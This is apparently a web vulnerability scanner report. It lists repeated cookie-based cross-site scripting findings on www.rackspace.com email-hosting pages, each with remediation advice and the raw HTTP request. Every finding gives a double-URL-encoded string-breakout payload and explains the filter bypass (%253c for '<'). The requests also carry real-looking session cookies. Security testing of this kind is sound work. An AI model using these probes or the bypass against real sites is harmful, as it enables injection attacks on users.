The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6abc2%2527%253be5cc790193a was submitted in the IS_UASrackuid cookie. This input was echoed as 6abc2';e5cc790193a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/email_archiving/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f86abc2%2527%253be5cc790193a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1191%2527%253b6ce7163e15a was submitted in the IS_UASrackuid cookie. This input was echoed as f1191';6ce7163e15a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/exchange_hosting HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8f1191%2527%253b6ce7163e15a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bad4f%2527%253bb865cd9355d was submitted in the IS_UASrackuid cookie. This input was echoed as bad4f';b865cd9355d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/exchange_hosting/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8bad4f%2527%253bb865cd9355d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6b8c%2527%253b214229cb995 was submitted in the IS_UASrackuid cookie. This input was echoed as a6b8c';214229cb995 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/exchange_hosting/on_your_mobile/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a6b8c%2527%253b214229cb995; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40a71%2527%253b1860f0779c0 was submitted in the IS_UASrackuid cookie. This input was echoed as 40a71';1860f0779c0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/exchange_hybrid/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f840a71%2527%253b1860f0779c0; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a82cd%2527%253b877d852156d was submitted in the IS_UASrackuid cookie. This input was echoed as a82cd';877d852156d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/migrations/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a82cd%2527%253b877d852156d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97cf2%2527%253bf7509b3957e was submitted in the IS_UASrackuid cookie. This input was echoed as 97cf2';f7509b3957e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/rackspace_email?MMP=loginpg_hosted_email HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f897cf2%2527%253bf7509b3957e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d103%2527%253bcc842ca331 was submitted in the IS_UASrackuid cookie. This input was echoed as 8d103';cc842ca331 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/rackspace_email/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f88d103%2527%253bcc842ca331; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc28a%2527%253bb741c739f4f was submitted in the IS_UASrackuid cookie. This input was echoed as fc28a';b741c739f4f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/rackspace_email/on_your_mobile/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8fc28a%2527%253bb741c739f4f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 898e2%2527%253bd50409f66e2 was submitted in the IS_UASrackuid cookie. This input was echoed as 898e2';d50409f66e2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting_service_planning_guide/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8898e2%2527%253bd50409f66e2; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5960e%2527%253b0f523ca6614 was submitted in the IS_UASrackuid cookie. This input was echoed as 5960e';0f523ca6614 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_industry_leadership/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
